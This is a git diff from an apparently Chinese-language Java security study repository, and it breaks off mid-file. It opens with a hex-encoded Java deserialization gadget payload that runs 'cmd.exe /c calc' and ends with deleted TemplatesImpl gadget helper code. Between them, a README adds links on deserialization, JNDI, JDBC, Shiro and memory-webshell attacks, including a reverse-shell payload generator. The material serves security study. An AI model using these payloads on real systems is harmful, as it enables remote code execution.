6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e008000000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00807371007e00797571007e007d00000002707571007e007d00000000740006696e766f6b657571007e008000000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e007d7371007e00797571007e007d00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000003740007636d642e6578657400022f6374000463616c63740004657865637571007e0080000000017671007e00917371007e0075737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787807000005fe000022000100 +cc030000032f2a206d7973716c2d636f6e6e6563746f722d6a6176612d352e312e34372028205265766973696f6e3a20666531393033623165636234613936613931376637656433313930643830633034396231646532392029202a2f53454c4543542020404073657373696f6e2e6175746f5f696e6372656d656e745f696e6372656d656e74204153206175746f5f696e6372656d656e745f696e6372656d656e742c2040406368617261637465725f7365745f636c69656e74204153206368617261637465725f7365745f636c69656e742c2040406368617261637465725f7365745f636f6e6e656374696f6e204153206368617261637465725f7365745f636f6e6e656374696f6e2c2040406368617261637465725f7365745f726573756c7473204153206368617261637465725f7365745f726573756c74732c2040406368617261637465725f7365745f736572766572204153206368617261637465725f7365745f7365727665722c204040636f6c6c6174696f6e5f73657276657220415320636f6c6c6174696f6e5f7365727665722c204040636f6c6c6174696f6e5f636f6e6e656374696f6e20415320636f6c6c6174696f6e5f636f6e6e656374696f6e2c204040696e69745f636f6e6e65637420415320696e69745f636f6e6e6563742c204040696e7465726163746976655f74696d656f757420415320696e7465726163746976655f74696d656f75742c2040406c6963656e7365204153206c6963656e73652c2040406c6f7765725f636173655f7461626c655f6e616d6573204153206c6f7765725f636173655f7461626c655f6e616d65732c2040406d61785f616c6c6f7765645f7061636b6574204153206d61785f616c6c6f7765645f7061636b65742c2040406e65745f6275666665725f6c656e677468204153206e65745f6275666665725f6c656e6774682c2040406e65745f77726974655f74696d656f7574204153206e65745f77726974655f74696d656f75742c20404071756572795f63616368655f73697a652041532071756572795f63616368655f73697a652c20404071756572795f63616368655f747970652041532071756572795f63616368655f747970652c20404073716c5f6d6f64652041532073716c5f6d6f64652c20404073797374656d5f74696d655f7a6f6e652041532073797374656d5f74696d655f7a6f6e652c20404074696d655f7a6f6e652041532074696d655f7a6f6e652c20404074785f69736f6c6174696f6e204153207472616e73616374696f6e5f69736f6c6174696f6e2c204040776169745f74696d656f757420415320776169745f74696d656f7574 diff --git a/PyCharm/JDBC/Mysql/hex1.pcap b/PyCharm/JDBC/Mysql/hex1.pcap new file mode 100644 index 0000000..795c3f6 Binary files /dev/null and b/PyCharm/JDBC/Mysql/hex1.pcap differ diff --git a/README.md b/README.md index 4bf4d31..bbdd6df 100644 --- a/README.md +++ b/README.md @@ -5,40 +5,24 @@ - [Java基础](#Java基础) - [Java安全基础](#Java安全基础) -- [代码 / jar包调试](#代码 / jar包调试) +- [代码和jar包调试](#代码和jar包调试) +- [查漏补缺](#查漏补缺) - [反序列化](#反序列化) - - CC链 - - hessian - - 其他链子&姿势 - [JNDI](#JNDI) - - 基础内容 - - 高版本JDK绕过 - - 基于BeanFactory - - 其他Factory绕过(主要结合JDBC打) - [JDBC](#JDBC) - [shiro](#shiro) - - - shiro反序列化 - - shiro越权 - [Fastjson&Jackson&SnakeYaml](#Fastjson&Jackson&SnakeYaml) - [内存马&回显技术](#内存马&回显技术) - [高版本jdk下的链子](#高版本jdk下的链子) +- [表达式+SSTI](#表达式+SSTI) - [RASP](#RASP) -- [SpringBoot](#SpringBoot) +- [中间件相关](#中间件相关) +- [Spring系列](#Spring系列) - [工具开发/二开](#devTools) - [代码审计](#CodeAudit) - - - 若依 - - - WebGoat - - 泛微Ecology9 - - 用友U8Cloud - [代码审计辅助工具](#代码审计辅助工具) - - - jar-analyzer - - tabby - - CodeQL -- [学习路线整合](#学习路线整合) +- [参考学习路线](#参考学习路线) +- [博客&公众号整理](#博客整理) - [工具推荐](#工具推荐) @@ -107,7 +91,25 @@
-# 代码 / jar包调试 +# JavaWeb基础 + +## JavaWeb常见漏洞 + +### XXE + +[XXE整理 | 1diot9's Blog](https://1diot9.github.io/2025/11/18/XXE整理/) 参考的文章记得看 + +[一篇文章带你深入理解漏洞之 XXE 漏洞-先知社区](https://xz.aliyun.com/news/2994) 虽然不针对Java，但是写的很完整 + + + + + + + +
+ +# 代码 / jar包调试一开始做ctf题的时候，遇到过很尴尬的情况，拿到jar包，不知道要怎么在本地调试。后面才学习到了反编译，远程调试等内容。 @@ -119,8 +121,24 @@
+# 查漏补缺 + +主要记录一些新遇到的小知识。 + +[Java Runtime.getRuntime().exec由表及里-先知社区](https://xz.aliyun.com/news/6642) 剖析了Runtime为什么不能识别特殊符号的本质 + +[shadow-horse/java.lang.Runtime.exec-Payload: 反弹shell，Runtime.exec()执行系统命令](https://github.com/shadow-horse/java.lang.Runtime.exec-Payload) Runtime命令生成 + + + +
+ + + # 反序列化 +一开始可以只看CC链 + ## CC链 CC链是Java反序列化的开始，每个人都应该好好学习。 @@ -131,15 +149,51 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 [Java 反序列化漏洞（二） - Commons Collections | 素十八](https://su18.org/post/ysoserial-su18-2/#commonscollections1) su18师傅的反序列化取经路 -=========================快速入门的话，可以只看上面的CC链========================= +=========================快速入门的话，可以只看上面的========================= + +[CC链再次挖掘-先知社区](https://xz.aliyun.com/news/14431) 可以尝试一下自己能不能找到其他类利用 + +[CC链再挖掘 | 1diot9's Blog](https://1diot9.github.io/2025/10/27/CC链再挖掘/) 基于上面的文章，着重于如何审计 + +[java反序列化漏洞commons-collections3.2.1TransformedList触发transform-先知社区](https://xz.aliyun.com/news/13748) + +[老链新看——CommonsCollections链](https://mp.weixin.qq.com/s/zNsTKVumW-wa91Eb63WVZA)
## hessian -[Java安全学习——Hessian反序列化漏洞 - 枫のBlog](https://goodapple.top/archives/1193) +[Hessian反序列化原理到武器化利用 - FreeBuf网络安全行业门户](https://www.freebuf.com/articles/web/424308.html) 简要原理+常规链子 + +[超详细解析Hessian利用链-先知社区](https://xz.aliyun.com/news/13039) 常规链子 + +[漏洞篇 - Hessian 反序列化详解 - 妙尽璇机](https://changeyourway.github.io/2025/02/20/Java 安全/漏洞篇-Hessian反序列化/) 常规链子 + +[Java安全学习——Hessian反序列化漏洞 - 枫のBlog](https://goodapple.top/archives/1193) 原理+Apache Dubbo + +[0CTF/TCTF 2022 hessian-onlyJdk | Bmth's blog](http://www.bmth666.cn/2023/02/07/0CTF-TCTF-2022-hessian-onlyJdk/index.html) only-jdk链 + +[0ctf2022 hessian-only-jdk writeup jdk原生链-先知社区](https://xz.aliyun.com/news/11178) tabby挖掘 + +[Hessian 反序列化新链分析与坑点 | zoiltin's Blog](https://zoiltin.github.io/posts/hessian反序列化新链分析与坑点/) 新链 + +[从2025blackhat-jdd hessian反序列化jdk原生新链开始学习链子构造-先知社区](https://xz.aliyun.com/news/18935) 新链 + +[Hessian反序列化流程及漏洞浅析-先知社区](https://xz.aliyun.com/news/17603) + +[基础篇 - Hessian 协议详解 - 妙尽璇机](https://changeyourway.github.io/2024/11/13/Java 安全/基础篇-Hessian协议详解/) -[Hessian 反序列化知一二 | 素十八](https://su18.org/post/hessian/) +[Hessian 反序列化漏洞 · 攻击Java Web应用-Java Web安全\]](https://www.javasec.org/java-vuls/Hessian.html) + +[Hessian 反序列化知一二 | 素十八](https://su18.org/post/hessian/) + +
+ +## 利用链探测 + +[构造java探测class反序列化gadget | 回忆飘如雪](https://gv7.me/articles/2021/construct-java-detection-class-deserialization-gadget/#0x01-背景) 实战下利用链探测，dns法，反序列化炸弹延时法 + +[Java序列化炸弹解析-CSDN博客](https://blog.csdn.net/nevermorewo/article/details/100100048)
@@ -147,7 +201,7 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 [Java反序列化之C3P0链 | Drunkbaby's Blog](https://drun1baby.top/2022/10/06/Java反序列化之C3P0链/) c3p0，可以打二次反序列化 -[分析尝试利用tabby挖掘-SpringAOP链 - Potat0w0](https://blog.potatowo.top/2025/03/31/从复现到尝试用tabby挖掘-SpringAOP链/) +[分析尝试利用tabby挖掘-SpringAOP链 - Potat0w0](https://blog.potatowo.top/2025/03/31/从复现到尝试用tabby挖掘-SpringAOP链/) [realworldctf old system复盘（jdk1.4 getter jndi gadget）-先知社区](https://xz.aliyun.com/news/8630) LdapAttribute链 @@ -171,41 +225,79 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 [JNDI · 攻击Java Web应用-Java Web安全](https://www.javasec.org/javase/JNDI/#jndi) 里面引用了一篇命名和目录服务基本概念的文章，记得看，对后面理解RMI和LDAP很有帮助，很多东西都会在调试里遇到 +[Log4j2漏洞分析 | 1diot9's Blog](https://1diot9.github.io/2025/12/08/Log4j2漏洞分析/) + =========================快速入门的话，可以先只看上面部分的========================= -
+## RMI、JRMP、JEP290、LDAP -## 高版本JDK绕过 +这里的目标是： -### 基于BeanFactory +1、搞清楚RMI的通信流程，搞清楚Server，Registry，Client三者互相的打法 -[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_0x01-beanfactory) 除了最基本的EL表达式执行，还有Snakeyaml，XStream等方式（高版本tomcat的forceString被禁） +2、了解JRMP在RMI中的作用，知道它和DGC的关系 -
+3、了解两次JEP290的防护和绕过，JEP290(8u121~8u230)，JEP290(>8u231) -### 其他Factory绕过 +4、了解JNDI的基本打法，包括codebase远程加载，ldap发送反序列化数据，reference本地工厂(BeanFactory为例) -[SolarWinds Security Event Manager AMF 反序列化 RCE (CVE-2024-0692) - X1r0z Blog](https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#hikaricp-jndi-注入) Hikari跟Druid一样，都可以实现JNDI+JDBC，都是可以执行初始化sql语句 +[RMI JRMP JEP290 LDAP基础梳理 | 1diot9's Blog](https://1diot9.github.io/2025/11/10/RMI-JRMP-JEP290-LDAP基础梳理/) 我这篇写的比较完整，但是不会过于全面，可以先看 -[高版本JNDI注入-高版本Tomcat利用方案-先知社区](https://xz.aliyun.com/news/16156) +下面整理当时看的部分文章 -[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_snakeyaml) jdk17的题特别喜欢考JNDI+JDBC +### 综合梳理 -[JNDI jdk高版本绕过—— Druid-先知社区](https://xz.aliyun.com/news/10104) +[奇安信攻防社区-JAVA JRMP、RMI、JNDI、反序列化漏洞之间的风花雪月](https://forum.butian.net/share/2278) 这个感觉最清楚，底下的参考文章也看看 -
+[基于Java反序列化RCE - 搞懂RMI、JRMP、JNDI-先知社区](https://xz.aliyun.com/news/6675) + +[搞懂RMI、JRMP、JNDI-终结篇-先知社区](https://xz.aliyun.com/news/6860) 里面提到的文章也要看 -## 未分类 +### RMI -[RMI协议分析 - lvyyevd's 安全博客](http://www.lvyyevd.cn/archives/rmi-xie-yi-fen-xi) +[RMI协议分析 - lvyyevd's 安全博客](http://www.lvyyevd.cn/archives/rmi-xie-yi-fen-xi) -[Java RMI 攻击由浅入深 | 素十八](https://su18.org/post/rmi-attack/) +[Java RMI 攻击由浅入深 | 素十八](https://su18.org/post/rmi-attack/) + +[RMI-攻击方式总结-安全KER - 安全资讯平台](https://www.anquanke.com/post/id/257452#h2-6) 有比较完整的示例代码 [MyJavaSecStudy/docs/Java安全漫谈.pdf at main · 1diot9/MyJavaSecStudy](https://github.com/1diot9/MyJavaSecStudy/blob/main/docs/Java安全漫谈.pdf) 04-06详细讲了RMI的通信过程 +### JRMP&JEP290 + +[JRMP通信攻击过程及利用介绍-先知社区](https://xz.aliyun.com/news/15240) + +[RMI-JEP290的分析与绕过-安全KER - 安全资讯平台](https://www.anquanke.com/post/id/259059#h2-0) + +[Shiro有key但无回显利用链子-JRMP大法_shiro有key无链怎么办?-CSDN博客](https://blog.csdn.net/weixin_43264067/article/details/139626398) 可以通过jrmp进行利用链探测 + +
+ +## 高版本JDK绕过 + +### 基于反序列化 + +[RMI JRMP JEP290 LDAP基础梳理 | 1diot9's Blog](https://1diot9.github.io/2025/11/10/RMI-JRMP-JEP290-LDAP基础梳理/) 5.1.1和5.2.2有讲 + +### 基于BeanFactory + +[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_0x01-beanfactory) 除了最基本的EL表达式执行，还有Snakeyaml，XStream等方式（高版本tomcat的forceString被禁） + +
+ +### 其他Factory绕过 + [京麟CTF 2024 ezldap 分析-先知社区](https://xz.aliyun.com/news/14103) com.sun.jndi.ldap.object.trustSerialData false的绕过 -[奇安信攻防社区-【2024补天白帽黑客大会】JNDI新攻击面探索](https://forum.butian.net/share/3857) +[SolarWinds Security Event Manager AMF 反序列化 RCE (CVE-2024-0692) - X1r0z Blog](https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#hikaricp-jndi-注入) Hikari跟Druid一样，都可以实现JNDI+JDBC，都是可以执行初始化sql语句 + +[高版本JNDI注入-高版本Tomcat利用方案-先知社区](https://xz.aliyun.com/news/16156) + +[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_snakeyaml) jdk17的题特别喜欢考JNDI+JDBC + +[JNDI jdk高版本绕过—— Druid-先知社区](https://xz.aliyun.com/news/10104) + +[奇安信攻防社区-【2024补天白帽黑客大会】JNDI新攻击面探索](https://forum.butian.net/share/3857)
@@ -215,6 +307,8 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 [MySQL jdbc 反序列化分析 | Drunkbaby's Blog](https://drun1baby.top/2023/01/13/MySQL-jdbc-反序列化分析/) 最经典的mysql-jdbc +[mysql JDBC 攻击 | 1diot9's Blog](https://1diot9.github.io/2025/05/05/mysql-JDBC-绕过/) 整理了打法和绕过 + ============如果真的很急，JDBC可以先只看上面这一个mysql，其他的遇到了再学================= [从JDBC MySQL不出网攻击到spring临时文件利用-先知社区](https://xz.aliyun.com/news/17830) 这个打法比较新，其中的临时文件上传适用性广 @@ -283,11 +377,23 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 ====================shiro反序列化快速入门的话，可以只看上面的====================== +[全版本Shiro反序列化漏洞原理详解 - Smile3306 - 博客园](https://www.cnblogs.com/Smile3306/p/18984943) 详细梳理了加密和利用原理 + +[CBC字节翻转攻击&Padding Oracle Attack原理解析 - 枫のBlog](https://goodapple.top/archives/217) 721构造合法密文的具体原理 + [Shiro RememberMe 漏洞检测的探索之路 - CT Stack 安全社区](https://stack.chaitin.com/techblog/detail/39) 通过密钥正常错误时，回显中rememberMe字段的不同来实现密钥爆破 -[一种另类的 shiro 检测方式](https://mp.weixin.qq.com/s/do88_4Td1CSeKLmFqhGCuQ) +[奇安信攻防社区-一种另类的shiro检测方式](https://forum.butian.net/share/92) + +payload缩短这部分内容挺多的，感觉能单独研究了。 + +[Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面提到的文章都要看 + +[浅谈Shiro550受Tomcat Header长度限制影响突破](https://y4tacker.github.io/2022/04/14/year/2022/4/浅谈Shiro550受Tomcat-Header长度限制影响突破/) 这里提供了其他缩短的方法 + +[终极Java反序列化Payload缩小技术](https://mp.weixin.qq.com/s/cQCYhBkR95vIVBicA9RR6g) + -[Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面还提到pen4uin师傅的文章，也可以去看看
@@ -353,14 +459,16 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 =====================快速入门的话，可以先只看上面的几篇文章====================== -[bitterzzZZ/MemoryShellLearn: 分享几个直接可用的内存马，记录一下学习过程中看过的文章](https://github.com/bitterzzZZ/MemoryShellLearn) +[bitterzzZZ/MemoryShellLearn: 分享几个直接可用的内存马，记录一下学习过程中看过的文章](https://github.com/bitterzzZZ/MemoryShellLearn) -[Getshell/Mshell: Memshell-攻防内存马研究](https://github.com/Getshell/Mshell) +[Getshell/Mshell: Memshell-攻防内存马研究](https://github.com/Getshell/Mshell) -[W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马，公众号：追梦信安](https://github.com/W01fh4cker/LearnJavaMemshellFromZero) +[W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马，公众号：追梦信安](https://github.com/W01fh4cker/LearnJavaMemshellFromZero) 上面这三篇都是内存马学习的相关项目，里面有很多优秀的文章和案例代码 +[浅谈 Java Agent 内存马 – 天下大木头](https://wjlshare.com/archives/1582) + [奇安信攻防社区-Solon框架注入内存马](https://forum.butian.net/share/3700) 里面提到的Java Object Searcher值得学习 [c0ny1/java-object-searcher: java内存对象搜索辅助工具](https://github.com/c0ny1/java-object-searcher) @@ -373,6 +481,10 @@ CC链是Java反序列化的开始，每个人都应该好好学习。
+### 其他内存马 + +[Lilctf_blade_cc](https://www.n1ght.cn/2025/08/21/blade_cc/#blade内存马) blade内存马 + ### 内存马工具 [pen4uin/java-memshell-generator: 一款支持自定义的 Java 内存马生成工具｜A customizable Java in-memory webshell generation tool.](https://github.com/pen4uin/java-memshell-generator) @@ -385,6 +497,8 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 [pen4uin/java-echo-generator: 一款支持自定义的 Java 回显载荷生成工具｜A customizable Java echo payload generation tool.](https://github.com/pen4uin/java-echo-generator) 回显技术的工具 +[java_linux通用回显马](https://www.n1ght.cn/2025/08/21/java_linux通用回显马/) +
@@ -405,6 +519,34 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 +
+ +# 表达式+SSTI + +## SPEL + +[SpEL表达式注入漏洞学习和回显poc研究 - bitterz - 博客园](https://www.cnblogs.com/bitterz/p/15206255.html#语法基础) 写的比较简洁，可以按里面搭Web环境 + +[SpEL注入RCE分析与绕过-先知社区](https://xz.aliyun.com/news/8744) payload比较完整 + +[Java 之 SpEL 表达式注入 | Drunkbaby's Blog](https://drun1baby.top/2022/09/23/Java-之-SpEL-表达式注入/) 写的很详细，包括SPEL用法 + +
+ +## EL + + + +
+ +## Thymeleaf + +[Java Thymeleaf SSTI(本质为SpEL) | Godown_blog](https://godownio.github.io/2025/04/28/java-thymeleaf-ssti-spel/) + + + + +
# RASP @@ -413,31 +555,61 @@ CC链是Java反序列化的开始，每个人都应该好好学习。
-# SpringBoot +# 中间件相关 + +## Tomcat + +[Tomcat URL解析差异性导致的安全问题-先知社区](https://xz.aliyun.com/news/7139) + +## Resin + +[URL解析导致的鉴权绕过问题探究-Resin篇 - 进阶的胖闹-pwnull](https://pwnull.github.io/2023/from-urlparser-to-authbypass-resin/) + +# Spring系列 + +## SpringBoot [LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料，利用方法和技巧合集，黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit) 总结了SpringBoot的常见利用方式
-## heapdump分析 +### 源码分析 + +[DispatcherServlet.doDispatch请求分发详解 | Godown_blog](https://godownio.github.io/2025/03/25/spring-dispatcherservlet-xiang-jie/) + +
+ +### URL解析差异 + +[URL解析导致的鉴权绕过问题探究-SpringSecurity篇 - 进阶的胖闹-pwnull](https://pwnull.github.io/2023/from-urlparser-to-authbypass-SpringSecurity/) + +[7. JEECG-灰盒Fuzzing](https://www.yuque.com/pmiaowu/gpy1q8/gl653fmytz1hoyev) + +
+ +### heapdump分析主要是jdk自带的VisualVM看jdk版本，heapdump_tools分析依赖和密码 +[heapdump深度利用之信息泄露篇](https://mp.weixin.qq.com/s/VBCjtLxcdFvIJ0uK-sCdDw) + [Springboot信息泄露以及heapdump的利用_heapdump信息泄露-CSDN博客](https://blog.csdn.net/weixin_44309905/article/details/127279561) [京麟CTF 2024 ezldap 分析-先知社区](https://xz.aliyun.com/news/14103?time__1311=eqUxuiDt5WqYqY5DsD7mPD%3DIZK7q9hGBbD&u_atoken=b94f9c93564049e1d2601ebb22a1098b&u_asig=0a472f9217433333617862864e004b)
-## 文件缓存机制 +### 文件缓存机制 [从JDBC MySQL不出网攻击到spring临时文件利用-先知社区](https://xz.aliyun.com/news/17830) - -
+## Spring Cloud +[Spring Cloud GateWay CVE-2025-41243 分析-先知社区](https://xz.aliyun.com/news/19006) + +[CVE-2025-41243 Spring Cloud Gateway SpEL 沙箱从任意属性访问到任意文件下载 - 白帽酱の博客](https://rce.moe/2025/09/29/CVE-2025-41243/) # 工具开发/二开 @@ -449,13 +621,7 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 -# JavaWeb基础 - -待完善。。。 - - -
# 代码审计 @@ -505,14 +671,24 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 [用友U8Cloud环境搭建 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/U8Cloud环境搭建/) +[用友U8Cloud最新前台RCE漏洞挖掘过程分享](https://mp.weixin.qq.com/s/gwdzmBCu5PjYdzVeWEcpDQ) + [用友U8cloud-esnserver接口RCE | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-esnserver接口RCE/) [用友U8cloud-ServiceDispacherServlet反序列化 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-ServiceDispacherServlet反序列化/) -[微信公众平台](https://mp.weixin.qq.com/s/gwdzmBCu5PjYdzVeWEcpDQ) - [用友U8cloud-LoginVideoServlet接口反序列化 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-LoginVideoServlet接口反序列化/) +## 契约锁 + +[契约锁电子签章系统 pdfverifier rce 前台漏洞分析(从源码分析)-先知社区](https://xz.aliyun.com/news/18520) + +[契约锁pdfverifier RCE攻防绕过史](https://mp.weixin.qq.com/s/u--mcFjhYly74q-Qg3D7jQ) + +[契约锁电子签章系统 pdfverifier 远程代码执行漏洞分析（补丁包逆向分析）-先知社区](https://xz.aliyun.com/news/18482) + +[契约锁代码审计分析_契约锁漏洞-CSDN博客](https://blog.csdn.net/baidu_25299117/article/details/139990814) +
# 代码审计辅助工具 @@ -541,6 +717,16 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 [1. 案例-CodeQL自动化挖掘JavaSecCode](https://www.yuque.com/pmiaowu/gpy1q8/upavb10n5vnit3y3) +[使用CodeQL_n1ght进行漏洞审计思路-先知社区](https://xz.aliyun.com/news/18769) 实战审计例子，有空看看 + +[codeql带依赖jar包数据库生成](https://www.n1ght.cn/2025/06/16/codeql带依赖jar包数据库生成/) + +[CodeQL踩坑日记and规则分享](https://mp.weixin.qq.com/s/cOXc0MyDXhslTPBENfd4Pg) + +[CodeQL分析java反序列化gadget第一期--CC1链-先知社区](https://xz.aliyun.com/news/18578) + +[聊一聊 CodeQL 基础之过河问题](https://mp.weixin.qq.com/s/CCwWUrRa0K_hcBYEaAe8xQ) + [利用Github Actions生成CodeQL数据库 -- 以AliyunCTF2024 Chain17的反序列化链挖掘为例 - KingBridge - 博客园](https://www.cnblogs.com/kingbridge/articles/18100619) [aliyun ctf chain17 回顾(超详细解读)-先知社区](https://xz.aliyun.com/news/16179) @@ -565,7 +751,7 @@ CC链是Java反序列化的开始，每个人都应该好好学习。 -# 学习路线整合 +# 参考学习路线这里是其他师傅整理的学习路线，我这里仅列举了我看过的一些，如果有其他推荐的，可以私聊我 @@ -585,6 +771,38 @@ CC链是Java反序列化的开始，每个人都应该好好学习。
+# 博客&公众号整理 + +整理一些我经常看的博客和公众号。由于个人见识有些，可能有很多其他优秀的博客和公众号没收录 + +## 博客 + +[Archives | Bmth's blog](http://www.bmth666.cn/archives/) + +[Y4tacker:Hacking The World!](https://y4tacker.github.io/) + +[All Posts - X1r0z Blog](https://exp10it.io/posts/) + +[Jasper_sec](https://jaspersec.top/) + +[真爱和自由的个人主页-先知社区](https://xz.aliyun.com/users/141946/news) + +[Archives - Boogiepop Doesn't Laugh](https://boogipop.com/archives/) + +
+ +## 公众号 + +漫漫安全路 + +珂技知识分享里面还有pwn入门文章 + +菜狗安全 + +Heihu Share + +
+ # 工具推荐 [vulhub/java-chains: Vulhub Vulnerability Reproduction Designated Platform](https://github.com/vulhub/java-chains) 利用链神器 diff --git a/hessian/.gitignore b/hessian/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/hessian/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/hessian/.idea/.gitignore b/hessian/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/hessian/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/hessian/.idea/encodings.xml b/hessian/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/hessian/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/misc.xml b/hessian/.idea/misc.xml new file mode 100644 index 0000000..8345e46 --- /dev/null +++ b/hessian/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/uiDesigner.xml b/hessian/.idea/uiDesigner.xml new file mode 100644 index 0000000..2b63946 --- /dev/null +++ b/hessian/.idea/uiDesigner.xml @@ -0,0 +1,124 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/vcs.xml b/hessian/.idea/vcs.xml new file mode 100644 index 0000000..6c0b863 --- /dev/null +++ b/hessian/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/hessian/Hessian.bin b/hessian/Hessian.bin new file mode 100644 index 0000000..70bb29e Binary files /dev/null and b/hessian/Hessian.bin differ diff --git a/hessian/HessianStudy/.idea/codeStyles/Project.xml b/hessian/HessianStudy/.idea/codeStyles/Project.xml deleted file mode 100644 index 919ce1f..0000000 --- a/hessian/HessianStudy/.idea/codeStyles/Project.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml b/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml deleted file mode 100644 index a55e7a1..0000000 --- a/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml +++ /dev/null @@ -1,5 +0,0 @@ - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/ser.bin b/hessian/HessianStudy/ser.bin deleted file mode 100644 index 22f2dce..0000000 --- a/hessian/HessianStudy/ser.bin +++ /dev/null @@ -1 +0,0 @@ -Ccom.hessian.pojo.Person�nameagemap`1diOt9�HnamemaxyyyZ \ No newline at end of file diff --git a/hessian/HessianStudy/src/main/java/com/hessian/Tools.java b/hessian/HessianStudy/src/main/java/com/hessian/Tools.java deleted file mode 100644 index 5dc74d5..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/Tools.java +++ /dev/null @@ -1,78 +0,0 @@ -package com.hessian; - -import com.sun.org.apache.xalan.internal.xsltc.compiler.Template; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; - -import java.io.IOException; -import java.lang.reflect.Array; -import java.lang.reflect.Constructor; -import java.lang.reflect.Field; -import java.nio.file.Files; -import java.nio.file.Paths; -import java.util.HashMap; - -public class Tools { - public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { - Class aClass = obj.getClass(); - Field field = null; - while (aClass != null) { - try { - field = aClass.getDeclaredField(fieldName); - break; - } catch (NoSuchFieldException e) { - aClass = aClass.getSuperclass(); - } - } - field.setAccessible(true); - field.set(obj, value); - } - - public static Object getFieldValue(Object obj, String fieldName){ - Class aClass = obj.getClass(); - Field field = null; - while (aClass != null) { - try { - field = aClass.getDeclaredField(fieldName); - field.setAccessible(true); - return field.get(obj); - } catch (NoSuchFieldException e) { - aClass = aClass.getSuperclass(); - } catch (IllegalAccessException e) { - throw new RuntimeException(e); - } - } - return null; - } - - public static TemplatesImpl getTemplatesImpl() throws IllegalAccessException, IOException { - TemplatesImpl templatesImpl = new TemplatesImpl(); - setFieldValue(templatesImpl, "_class", null); - setFieldValue(templatesImpl, "_name", "any"); - setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl()); - byte[] bytes = Files.readAllBytes(Paths.get("D://1tmp//classes//CalcAbs.class")); - setFieldValue(templatesImpl, "_bytecodes", new byte[][] {bytes}); - return templatesImpl; - } - - public static HashMap makeMap (Object v1, Object v2 ) - throws Exception { - HashMap s = new HashMap<>(); - 